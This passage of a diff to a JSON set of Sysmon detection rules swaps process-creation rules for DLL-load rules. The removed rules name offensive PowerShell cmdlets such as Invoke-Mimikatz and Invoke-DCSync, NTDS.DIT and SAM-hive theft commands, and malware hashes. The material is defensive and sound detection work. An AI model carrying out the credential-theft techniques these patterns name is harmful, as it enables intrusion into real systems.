Threat Research)", "tags": [ "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.t1059" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_runxcmd.yml" + "filename": "image_load_pcre_net_load.yml" }, { - "title": "Malicious PowerShell Commandlets - ProcessCreation", - "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", - "status": "experimental", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Wmiprvse Wbemcomn DLL Hijack", + "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", + "status": "test", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine 
LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE 
'\\' OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE '%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE 
'%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE 
'\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE '%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' 
OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" + "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "GALLIUM IOCs", - "id": "440a56bf-7873-4439-940a-1c8a671073c2", + "title": "FoggyWeb Backdoor DLL Loading", + "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", "status": "test", - "description": "Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.", - "author": "Tim Burrell", + "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. 
Which loads a malicious version of the expected \"version.dll\" dll", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.command_and_control", - "attack.t1212", - "attack.t1071", - "attack.g0093" + "attack.resource_development", + "attack.t1587" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29%' ESCAPE '\\' OR Hashes LIKE '%SHA256=52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945%' ESCAPE '\\' OR Hashes LIKE '%SHA256=51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79%' ESCAPE '\\' OR Hashes LIKE '%SHA256=332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08%' ESCAPE '\\' OR Hashes LIKE '%SHA256=63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef%' ESCAPE '\\' OR Hashes LIKE '%SHA256=056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070%' ESCAPE '\\' OR Hashes LIKE '%SHA1=53a44c2396d15c3a03723fa5e5db54cafd527635%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c5e496921e3bc882dc40694f1dcc3746a75db19%' ESCAPE '\\' OR Hashes LIKE '%SHA1=aeb573accfd95758550cf30bf04f389a92922844%' ESCAPE '\\' OR Hashes LIKE '%SHA1=79ef78a797403a4ed1a616c68e07fff868a8650a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4f6f38b4cec35e895d91c052b1f5a83d665c2196%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e841a63e47361a572db9a7334af459ddca11347a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c28f606df28a9bc8df75a4d5e5837fc5522dd34d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2e94b305d6812a9f96e6781c888e48c7fb157b6b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dd44133716b8a241957b912fa6a02efde3ce3025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8793bf166cb89eb55f0593404e4e933ab605e803%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a39b57032dbb2335499a51e13470a7cd5d86b138%' ESCAPE '\\' OR Hashes LIKE '%SHA1=41cc2b15c662bc001c0eb92f6cc222934f0beeea%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d209430d6af54792371174e70e27dd11d3def7a7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1c6452026c56efd2c94cea7e0f671eb55515edb0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6b41d3afdcdcaf9f442bbe772f5da871801fd5a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4923d460e22fbbf165bbbaba168e5a46b8157d9f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f201504bd96e81d0d350c3a8332593ee1c9e09de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ddd2db1127632a2a52943a2fe516a2e7d05d70d2%' ESCAPE '\\') OR sha256 IN 
('9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd', '7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b', '657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5', '2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29', '52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77', 'a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3', '5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022', '6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883', '3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e', '1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7', 'fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1', '7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c', '178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945', '51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9', '889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79', '332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf', '44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08', '63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef', '056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070') OR sha1 IN ('53a44c2396d15c3a03723fa5e5db54cafd527635', '9c5e496921e3bc882dc40694f1dcc3746a75db19', 'aeb573accfd95758550cf30bf04f389a92922844', '79ef78a797403a4ed1a616c68e07fff868a8650a', '4f6f38b4cec35e895d91c052b1f5a83d665c2196', '1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d', 'e841a63e47361a572db9a7334af459ddca11347a', 'c28f606df28a9bc8df75a4d5e5837fc5522dd34d', '2e94b305d6812a9f96e6781c888e48c7fb157b6b', 'dd44133716b8a241957b912fa6a02efde3ce3025', '8793bf166cb89eb55f0593404e4e933ab605e803', 'a39b57032dbb2335499a51e13470a7cd5d86b138', '41cc2b15c662bc001c0eb92f6cc222934f0beeea', 'd209430d6af54792371174e70e27dd11d3def7a7', '1c6452026c56efd2c94cea7e0f671eb55515edb0', 
'c6b41d3afdcdcaf9f442bbe772f5da871801fd5a', '4923d460e22fbbf165bbbaba168e5a46b8157d9f', 'f201504bd96e81d0d350c3a8332593ee1c9e09de', 'ddd2db1127632a2a52943a2fe516a2e7d05d70d2')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_gallium_iocs.yml" + "filename": "image_load_malware_foggyweb_nobelium.yml" }, { - "title": "Suspicious Process Patterns NTDS.DIT Exfil", - "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", + "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", + "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", "status": "experimental", - "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\NTDSDump.exe' ESCAPE '\\' OR Image LIKE '%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR 
ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\apache%' ESCAPE '\\' OR Image LIKE '%\\\\tomcat%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '\tC:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_ntds.yml" + "filename": "image_load_dll_vssapi_susp_load.yml" }, { - "title": "Potential Emotet Rundll32 Execution", - "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", + "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", "status": "test", - "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", - "author": "FPT.EagleEye", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, 
SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\tracker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" ], - "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" + "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" }, { - "title": "Lazarus Group Activity", - "id": "24c4d154-05a4-4b99-b57d-9b977472443a", - "status": "test", - "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", - "author": "Florian Roth (Nextron Systems), wagga", + "title": "DLL Sideloading Of DBGCORE.DLL", + "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", + "status": "experimental", + "description": "Detects DLL sideloading of \"dbgcore.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.g0032", - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + 
"attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine LIKE 